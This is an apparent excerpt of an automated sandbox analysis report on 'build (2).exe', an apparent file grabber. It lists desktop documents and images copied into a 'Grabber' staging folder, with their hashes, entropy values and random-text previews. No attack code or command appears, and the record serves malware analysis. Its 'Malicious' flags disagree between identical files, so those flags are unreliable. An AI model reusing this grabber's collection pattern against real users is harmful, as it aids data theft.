Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY.jpg

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY.xlsx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\LSBIHQFDVT.pdf

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN.docx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN.xlsx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\GAOBCVIQIJ.jpg

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\IPKGELNTQY.xlsx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	true
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\LSBIHQFDVT.pdf

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\MXPXCVPDVN.docx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\QCFWYSKMHA.png

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
